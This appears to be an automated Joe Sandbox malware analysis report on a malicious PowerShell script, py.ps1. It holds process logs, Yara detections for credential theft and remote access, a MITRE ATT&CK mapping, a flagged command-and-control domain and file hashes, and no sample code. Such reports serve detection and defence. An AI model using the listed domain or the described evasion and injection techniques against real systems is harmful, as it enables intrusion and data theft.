              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
              Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match; File source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: notepad.exe PID: 3300, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: amsi64_1780.amsi.csv, type: OTHER
Source: Yara match; File source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: notepad.exe PID: 3300, type: MEMORYSTR
MITRE ATT&CK Matrix (rendered as a 14-column tactic matrix on the original page; only the techniques flagged for this sample are listed here, with the number of matching signatures in parentheses)
Execution: PowerShell (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (411), DLL Side-Loading (1)
Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (411), Deobfuscate/Decode Files or Information (1), Software Packing (3), DLL Side-Loading (1)
Credential Access: Input Capture (1)
Discovery: Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (13)
Collection: Input Capture (1), Archive Collected Data (11)
Command and Control: Encrypted Channel (1), Application Layer Protocol (1)
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no techniques flagged

Source: py.ps1; Detection: 0%; Scanner: ReversingLabs
No Antivirus matches
Source: nmds.duckdns.org; Detection: 1%; Scanner: Virustotal
No contacted domains info
Name: nmds.duckdns.org; Malicious: true; Antivirus Detection: (none listed); Reputation: unknown
Name: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator; Source: powershell.exe, 00000000.00000002.3073247493.0000011C86717000.00000004.00000800.00020000.00000000.sdmp, py.ps1; Malicious: false; Reputation: high
No contacted IP infos
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1429326
                Start date and time:2024-04-21 23:25:11 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 26s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:py.ps1
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winPS1@4/10@0/0
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 13
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .ps1
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time: 23:26:26; Type: API Interceptor; Description: 54x Sleep call for process: powershell.exe modified
                Process:C:\Windows\System32\notepad.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):654
                Entropy (8bit):5.380476433908377
                Encrypted:false
                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9434
                Entropy (8bit):4.9243637703272345
                Encrypted:false
                SSDEEP:192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
                MD5:EF4099FCAB6D29945272316889156337
                SHA1:5AAFAD4581D21179B892604BEBD6038792F8CBD6
                SHA-256:A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
                SHA-512:EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:Nlllulv4iZ:NllUg
                MD5:70F8065256CFB7FD75CA2A8F72BA3FA4
                SHA1:5A09385998FD735B5E5BD54F5901F3B180363A57
                SHA-256:F5DCDC55A3BF26D5E74BE7BA34D146984239C1CF7859C598B2B5A7C1A912755B
                SHA-512:CE4EEEC66F3553833690F46A08D17D9165D733753A2629998961A19EE57B94CF78961B1C3A0364434A943FF6DC964C5D15233224E8CC4E62507EA792313CC5D4
                Malicious:false
                Reputation:low
                Preview:@...e.................................~..............@..........
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6224
                Entropy (8bit):3.7218905206726274
                Encrypted:false
                SSDEEP:48:bLNVDzlatJ13CyUU2UWm5ukvhkvklCywZcqWNblHJqlSogZox8qWNbltqlSogZoD:1F413C2TUkvhkvCCty9NbHHR9NbvHW
                MD5:D1A7067F92D84246CA895C5FF8A8ED33
                SHA1:FD08CC94DB4742C05767522EF9F54BB817F20293
                SHA-256:1E4378E0348177E61FF27EF52194914B5E578C4793ACB481DC3F719CDE7BC6F5
                SHA-512:573220DD978F3E1242B444D37FF5211D4C1BAA5E7D2C2E120EC3C8F0646C14C5E4F401F09E0494194AC602E5B520B388687C7B1B910F0A287DE753EA5F321AEF
                Malicious:false
Preview: (binary data, not reproduced)
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):754
                Entropy (8bit):4.94526632697741
                Encrypted:false
                SSDEEP:12:NF+lDB5j7hV1cTivQN+GISkvXQKp2nWxktjXYHAWuOXQKtP2axoEIsgkvmr6aAlq:NF+lD7j7Nwivs+G7LKp2nXYTeKtP26LQ
                MD5:756C98B8ADCF531039DAAEAB52DAE2A1
                SHA1:373E22FDA8252B0A2F944808E455639E52BAE60B
                SHA-256:BA46313AAEFB4FD88A41B390926B968056E08376DDDC2FB7E12BE86F35358187
                SHA-512:34B22A7B3C765B1E02952E9419094FF0C1DA14EA8412DD3B3D522452675402D3D8E0D836A7C391C3D6223200A55F031E2A9A26AB1742923B281DC7FDF6B9C631
                Malicious:false
